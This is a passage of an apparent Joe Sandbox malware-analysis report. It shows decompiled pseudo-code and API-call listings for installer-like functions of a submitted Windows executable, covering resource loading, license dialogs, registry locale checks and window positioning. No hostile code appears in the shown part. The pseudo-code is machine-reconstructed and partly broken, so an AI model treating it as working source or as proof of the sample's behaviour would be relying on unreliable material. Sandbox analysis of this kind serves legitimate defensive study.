                                                                                                                                                                                                                                              • CharNextA.USER32(?), ref: 00972BD4
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 571164536-0
                                                                                                                                                                                                                                              • Opcode ID: 6a57ab36144564d0ff84dec836103a42c863544f1b4826c5b9ac5b5ff258cdfd
                                                                                                                                                                                                                                              • Instruction ID: 964ec7074d9650196d04e80d44809526610a830a62ce77fa4a115a9267cfdef2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6a57ab36144564d0ff84dec836103a42c863544f1b4826c5b9ac5b5ff258cdfd
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C241183651C2855FEB159F348C54AFD7BAD9F97300F14809AE8CE87202DB358E86DB51
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 86%
                                                                                                                                                                                                                                              			E009743D0(struct HWND__* __ecx, struct HWND__* __edx) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				struct tagRECT _v24;
                                                                                                                                                                                                                                              				struct tagRECT _v40;
                                                                                                                                                                                                                                              				struct HWND__* _v44;
                                                                                                                                                                                                                                              				intOrPtr _v48;
                                                                                                                                                                                                                                              				int _v52;
                                                                                                                                                                                                                                              				intOrPtr _v56;
                                                                                                                                                                                                                                              				int _v60;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t29;
                                                                                                                                                                                                                                              				void* _t53;
                                                                                                                                                                                                                                              				intOrPtr _t56;
                                                                                                                                                                                                                                              				int _t59;
                                                                                                                                                                                                                                              				struct HWND__* _t63;
                                                                                                                                                                                                                                              				struct HWND__* _t67;
                                                                                                                                                                                                                                              				struct HWND__* _t68;
                                                                                                                                                                                                                                              				struct HDC__* _t69;
                                                                                                                                                                                                                                              				int _t72;
                                                                                                                                                                                                                                              				signed int _t74;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t63 = __edx;
                                                                                                                                                                                                                                              				_t29 =  *0x978004; // 0x694569f9
                                                                                                                                                                                                                                              				_v8 = _t29 ^ _t74;
                                                                                                                                                                                                                                              				_t68 = __edx;
                                                                                                                                                                                                                                              				_v44 = __ecx;
                                                                                                                                                                                                                                              				GetWindowRect(__ecx,  &_v40);
                                                                                                                                                                                                                                              				_t53 = _v40.bottom - _v40.top;
                                                                                                                                                                                                                                              				_v48 = _v40.right - _v40.left;
                                                                                                                                                                                                                                              				GetWindowRect(_t68,  &_v24);
                                                                                                                                                                                                                                              				_v56 = _v24.bottom - _v24.top;
                                                                                                                                                                                                                                              				_t69 = GetDC(_v44);
                                                                                                                                                                                                                                              				_v52 = GetDeviceCaps(_t69, 8);
                                                                                                                                                                                                                                              				_v60 = GetDeviceCaps(_t69, 0xa);
                                                                                                                                                                                                                                              				ReleaseDC(_v44, _t69);
                                                                                                                                                                                                                                              				_t56 = _v48;
                                                                                                                                                                                                                                              				asm("cdq");
                                                                                                                                                                                                                                              				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
                                                                                                                                                                                                                                              				_t67 = 0;
                                                                                                                                                                                                                                              				if(_t72 >= 0) {
                                                                                                                                                                                                                                              					_t63 = _v52;
                                                                                                                                                                                                                                              					if(_t72 + _t56 > _t63) {
                                                                                                                                                                                                                                              						_t72 = _t63 - _t56;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_t72 = _t67;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				asm("cdq");
                                                                                                                                                                                                                                              				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
                                                                                                                                                                                                                                              				if(_t59 >= 0) {
                                                                                                                                                                                                                                              					_t63 = _v60;
                                                                                                                                                                                                                                              					if(_t59 + _t53 > _t63) {
                                                                                                                                                                                                                                              						_t59 = _t63 - _t53;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_t59 = _t67;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return E00976CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
                                                                                                                                                                                                                                              			}

























                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 009743F1
                                                                                                                                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 0097440B
                                                                                                                                                                                                                                              • GetDC.USER32(?), ref: 00974423
                                                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,00000008), ref: 0097442E
                                                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000000A), ref: 0097443A
                                                                                                                                                                                                                                              • ReleaseDC.USER32(?,00000000), ref: 00974447
                                                                                                                                                                                                                                              • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,00000001,?), ref: 009744A2
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Window$CapsDeviceRect$Release
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2212493051-0
                                                                                                                                                                                                                                              • Opcode ID: f7b874f191a3ce36cd1c1518d62ff3a29ef166ad6bb4ba1740f1fd0ba546bc94
                                                                                                                                                                                                                                              • Instruction ID: 9a7c55381486752b03b1db31b10c6bf662b969b558eb6e434a2b56195b8ea9f4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f7b874f191a3ce36cd1c1518d62ff3a29ef166ad6bb4ba1740f1fd0ba546bc94
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 06317E32E04119AFCB14CFB8DD88DEEBBB9EB89310F154169F809F3250DA306C459B60
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 53%
                                                                                                                                                                                                                                              			E00976298(intOrPtr __ecx, intOrPtr* __edx) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v28;
                                                                                                                                                                                                                                              				intOrPtr _v32;
                                                                                                                                                                                                                                              				struct HINSTANCE__* _v36;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t16;
                                                                                                                                                                                                                                              				struct HRSRC__* _t21;
                                                                                                                                                                                                                                              				intOrPtr _t26;
                                                                                                                                                                                                                                              				void* _t30;
                                                                                                                                                                                                                                              				struct HINSTANCE__* _t36;
                                                                                                                                                                                                                                              				intOrPtr* _t40;
                                                                                                                                                                                                                                              				void* _t41;
                                                                                                                                                                                                                                              				intOrPtr* _t44;
                                                                                                                                                                                                                                              				intOrPtr* _t45;
                                                                                                                                                                                                                                              				void* _t47;
                                                                                                                                                                                                                                              				signed int _t50;
                                                                                                                                                                                                                                              				struct HINSTANCE__* _t51;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t44 = __edx;
                                                                                                                                                                                                                                              				_t16 =  *0x978004; // 0x694569f9
                                                                                                                                                                                                                                              				_v8 = _t16 ^ _t50;
                                                                                                                                                                                                                                              				_t46 = 0;
                                                                                                                                                                                                                                              				_v32 = __ecx;
                                                                                                                                                                                                                                              				_v36 = 0;
                                                                                                                                                                                                                                              				_t36 = 1;
                                                                                                                                                                                                                                              				E0097171E( &_v28, 0x14, "UPDFILE%lu", 0);
                                                                                                                                                                                                                                              				while(1) {
                                                                                                                                                                                                                                              					_t51 = _t51 + 0x10;
                                                                                                                                                                                                                                              					_t21 = FindResourceA(_t46,  &_v28, 0xa);
                                                                                                                                                                                                                                              					if(_t21 == 0) {
                                                                                                                                                                                                                                              						break;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t45 = LockResource(LoadResource(_t46, _t21));
                                                                                                                                                                                                                                              					if(_t45 == 0) {
                                                                                                                                                                                                                                              						 *0x979124 = 0x80070714;
                                                                                                                                                                                                                                              						_t36 = _t46;
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						_t5 = _t45 + 8; // 0x8
                                                                                                                                                                                                                                              						_t44 = _t5;
                                                                                                                                                                                                                                              						_t40 = _t44;
                                                                                                                                                                                                                                              						_t6 = _t40 + 1; // 0x9
                                                                                                                                                                                                                                              						_t47 = _t6;
                                                                                                                                                                                                                                              						do {
                                                                                                                                                                                                                                              							_t26 =  *_t40;
                                                                                                                                                                                                                                              							_t40 = _t40 + 1;
                                                                                                                                                                                                                                              						} while (_t26 != 0);
                                                                                                                                                                                                                                              						_t41 = _t40 - _t47;
                                                                                                                                                                                                                                              						_t46 = _t51;
                                                                                                                                                                                                                                              						_t7 = _t41 + 1; // 0xa
                                                                                                                                                                                                                                              						 *0x97a288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
                                                                                                                                                                                                                                              						_t30 = _v32();
                                                                                                                                                                                                                                              						if(_t51 != _t51) {
                                                                                                                                                                                                                                              							asm("int 0x29");
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_push(_t45);
                                                                                                                                                                                                                                              						if(_t30 == 0) {
                                                                                                                                                                                                                                              							_t36 = 0;
                                                                                                                                                                                                                                              							FreeResource(??);
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							FreeResource();
                                                                                                                                                                                                                                              							_v36 = _v36 + 1;
                                                                                                                                                                                                                                              							E0097171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
                                                                                                                                                                                                                                              							_t46 = 0;
                                                                                                                                                                                                                                              							continue;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					L12:
                                                                                                                                                                                                                                              					return E00976CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				goto L12;
                                                                                                                                                                                                                                              			}























                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 0097171E: _vsnprintf.MSVCRT ref: 00971750
                                                                                                                                                                                                                                              • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,009751CA,00000004,00000024,00972F71,?,00000002,00000000), ref: 009762CD
                                                                                                                                                                                                                                              • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,009751CA,00000004,00000024,00972F71,?,00000002,00000000), ref: 009762D4
                                                                                                                                                                                                                                              • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,009751CA,00000004,00000024,00972F71,?,00000002,00000000), ref: 0097631B
                                                                                                                                                                                                                                              • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 00976345
                                                                                                                                                                                                                                              • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,009751CA,00000004,00000024,00972F71,?,00000002,00000000), ref: 00976357
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
• Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                                                                                                                                                                                              • String ID: UPDFILE%lu
                                                                                                                                                                                                                                              • API String ID: 2922116661-2329316264
                                                                                                                                                                                                                                              • Opcode ID: 7679dab00dfdb74d5d9b75e083f762bd15f169cc316cf925b651fff73b066f69
                                                                                                                                                                                                                                              • Instruction ID: e91c10bfb7e665ad5e54845e218ee219fac203e87e2ae68979d8641e6ebbf7d0
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7679dab00dfdb74d5d9b75e083f762bd15f169cc316cf925b651fff73b066f69
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 79212633A04619ABDB149F64CC459FF7B7CFB84714B008119F90AA3241DB358D02DBE0
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 94%
                                                                                                                                                                                                                                              			E0097681F(void* __ebx) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v20;
                                                                                                                                                                                                                                              				struct _OSVERSIONINFOA _v168;
                                                                                                                                                                                                                                              				void* _v172;
                                                                                                                                                                                                                                              				int* _v176;
                                                                                                                                                                                                                                              				int _v180;
                                                                                                                                                                                                                                              				int _v184;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t19;
                                                                                                                                                                                                                                              				long _t31;
                                                                                                                                                                                                                                              				signed int _t35;
                                                                                                                                                                                                                                              				void* _t36;
                                                                                                                                                                                                                                              				intOrPtr _t41;
                                                                                                                                                                                                                                              				signed int _t44;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t36 = __ebx;
                                                                                                                                                                                                                                              				_t19 =  *0x978004; // 0x694569f9
                                                                                                                                                                                                                                              				_v8 = _t19 ^ _t44;
                                                                                                                                                                                                                                              				_t41 =  *0x9781d8; // 0x0
                                                                                                                                                                                                                                              				_t43 = 0;
                                                                                                                                                                                                                                              				_v180 = 0xc;
                                                                                                                                                                                                                                              				_v176 = 0;
                                                                                                                                                                                                                                              				if(_t41 == 0xfffffffe) {
                                                                                                                                                                                                                                              					 *0x9781d8 = 0;
                                                                                                                                                                                                                                              					_v168.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                                                              					if(GetVersionExA( &_v168) == 0) {
                                                                                                                                                                                                                                              						L12:
                                                                                                                                                                                                                                              						_t41 =  *0x9781d8; // 0x0
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						_t41 = 1;
                                                                                                                                                                                                                                              						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
                                                                                                                                                                                                                                              							goto L12;
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							_t31 = RegQueryValueExA(_v172, 0x971140, 0,  &_v184,  &_v20,  &_v180);
                                                                                                                                                                                                                                              							_t43 = _t31;
                                                                                                                                                                                                                                              							RegCloseKey(_v172);
                                                                                                                                                                                                                                              							if(_t31 != 0) {
                                                                                                                                                                                                                                              								goto L12;
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								_t40 =  &_v176;
                                                                                                                                                                                                                                              								if(E009766F9( &_v20,  &_v176) == 0) {
                                                                                                                                                                                                                                              									goto L12;
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									_t35 = _v176 & 0x000003ff;
                                                                                                                                                                                                                                              									if(_t35 == 1 || _t35 == 0xd) {
                                                                                                                                                                                                                                              										 *0x9781d8 = _t41;
                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                              										goto L12;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return E00976CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
                                                                                                                                                                                                                                              			}



















                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0097686E
                                                                                                                                                                                                                                              • GetSystemMetrics.USER32(0000004A), ref: 009768A7
                                                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 009768CC
                                                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,00971140,00000000,?,?,0000000C), ref: 009768F4
                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00976902
                                                                                                                                                                                                                                                • Part of subcall function 009766F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,0097691A), ref: 00976741
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • Control Panel\Desktop\ResourceLocale, xrefs: 009768C2
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
• Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                                                                                                                                                                                              • String ID: Control Panel\Desktop\ResourceLocale
                                                                                                                                                                                                                                              • API String ID: 3346862599-1109908249
                                                                                                                                                                                                                                              • Opcode ID: f4d7c00644e1365018f52894e88e573e9665e8df1a96d3d5ce0080c259be124a
                                                                                                                                                                                                                                              • Instruction ID: 581401e180ae9910fdb9b9f639082af1a61375af8b5ea0219a170bc3310e8457
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f4d7c00644e1365018f52894e88e573e9665e8df1a96d3d5ce0080c259be124a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B8318133A046189FDB21CB12CC04BABB77CFB85728F0081A9EA4DA6140DB309D85CF52
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E00973A3F(void* __eflags) {
                                                                                                                                                                                                                                              				void* _t3;
                                                                                                                                                                                                                                              				void* _t9;
                                                                                                                                                                                                                                              				CHAR* _t16;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t16 = "LICENSE";
                                                                                                                                                                                                                                              				_t1 = E0097468F(_t16, 0, 0) + 1; // 0x1
                                                                                                                                                                                                                                              				_t3 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                                                              				 *0x978d4c = _t3;
                                                                                                                                                                                                                                              				if(_t3 != 0) {
                                                                                                                                                                                                                                              					_t19 = _t16;
                                                                                                                                                                                                                                              					if(E0097468F(_t16, _t3, _t28) != 0) {
                                                                                                                                                                                                                                              						if(lstrcmpA( *0x978d4c, "<None>") == 0) {
                                                                                                                                                                                                                                              							LocalFree( *0x978d4c);
                                                                                                                                                                                                                                              							L9:
                                                                                                                                                                                                                                              							 *0x979124 = 0;
                                                                                                                                                                                                                                              							return 1;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t9 = E00976517(_t19, 0x7d1, 0, E00973100, 0, 0);
                                                                                                                                                                                                                                              						LocalFree( *0x978d4c);
                                                                                                                                                                                                                                              						if(_t9 != 0) {
                                                                                                                                                                                                                                              							goto L9;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						 *0x979124 = 0x800704c7;
                                                                                                                                                                                                                                              						L2:
                                                                                                                                                                                                                                              						return 0;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					E009744B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              					LocalFree( *0x978d4c);
                                                                                                                                                                                                                                              					 *0x979124 = 0x80070714;
                                                                                                                                                                                                                                              					goto L2;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				E009744B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              				 *0x979124 = E00976285();
                                                                                                                                                                                                                                              				goto L2;
                                                                                                                                                                                                                                              			}







                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009746A0
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: SizeofResource.KERNEL32(00000000,00000000,?,00972D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009746A9
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009746C3
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: LoadResource.KERNEL32(00000000,00000000,?,00972D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009746CC
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: LockResource.KERNEL32(00000000,?,00972D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009746D3
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: memcpy_s.MSVCRT ref: 009746E5
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 009746EF
                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00972F64,?,00000002,00000000), ref: 00973A5D
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00973AB3
                                                                                                                                                                                                                                                • Part of subcall function 009744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00974518
                                                                                                                                                                                                                                                • Part of subcall function 009744B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00974554
                                                                                                                                                                                                                                                • Part of subcall function 00976285: GetLastError.KERNEL32(00975BBC), ref: 00976285
                                                                                                                                                                                                                                              • lstrcmpA.KERNEL32(<None>,00000000), ref: 00973AD0
                                                                                                                                                                                                                                              • LocalFree.KERNEL32 ref: 00973B13
                                                                                                                                                                                                                                                • Part of subcall function 00976517: FindResourceA.KERNEL32(00970000,000007D6,00000005), ref: 0097652A
                                                                                                                                                                                                                                                • Part of subcall function 00976517: LoadResource.KERNEL32(00970000,00000000,?,?,00972EE8,00000000,009719E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00976538
                                                                                                                                                                                                                                                • Part of subcall function 00976517: DialogBoxIndirectParamA.USER32(00970000,00000000,00000547,009719E0,00000000), ref: 00976557
                                                                                                                                                                                                                                                • Part of subcall function 00976517: FreeResource.KERNEL32(00000000,?,?,00972EE8,00000000,009719E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00976560
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000,00973100,00000000,00000000), ref: 00973AF4
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                                                                                                                                                                                              • String ID: <None>$LICENSE
                                                                                                                                                                                                                                              • API String ID: 2414642746-383193767
                                                                                                                                                                                                                                              • Opcode ID: 1501db8d900461b1d0c6c73d988f169995f353afccded63cc4cd14f962468482
                                                                                                                                                                                                                                              • Instruction ID: 3dea159cb9ef2229e4bf821752d03d42f70c5a4642e43f50cae4d5d5ae0d524d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1501db8d900461b1d0c6c73d988f169995f353afccded63cc4cd14f962468482
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0611B7333582016BD7245F329C0AF2B3AADDBD5710B10C53EB94DD51E1DA798840B625
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 94%
                                                                                                                                                                                                                                              			E009724E0(void* __ebx) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t7;
                                                                                                                                                                                                                                              				void* _t20;
                                                                                                                                                                                                                                              				long _t26;
                                                                                                                                                                                                                                              				signed int _t27;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t20 = __ebx;
                                                                                                                                                                                                                                              				_t7 =  *0x978004; // 0x694569f9
                                                                                                                                                                                                                                              				_v8 = _t7 ^ _t27;
                                                                                                                                                                                                                                              				_t25 = 0x104;
                                                                                                                                                                                                                                              				_t26 = 0;
                                                                                                                                                                                                                                              				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                              					E0097658A( &_v268, 0x104, "wininit.ini");
                                                                                                                                                                                                                                              					WritePrivateProfileStringA(0, 0, 0,  &_v268);
                                                                                                                                                                                                                                              					_t25 = _lopen( &_v268, 0x40);
                                                                                                                                                                                                                                              					if(_t25 != 0xffffffff) {
                                                                                                                                                                                                                                              						_t26 = _llseek(_t25, 0, 2);
                                                                                                                                                                                                                                              						_lclose(_t25);
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return E00976CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
                                                                                                                                                                                                                                              			}












                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00972506
                                                                                                                                                                                                                                              • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 0097252C
                                                                                                                                                                                                                                              • _lopen.KERNEL32 ref: 0097253B
                                                                                                                                                                                                                                              • _llseek.KERNEL32(00000000,00000000,00000002), ref: 0097254C
                                                                                                                                                                                                                                              • _lclose.KERNEL32(00000000), ref: 00972555
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
• Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
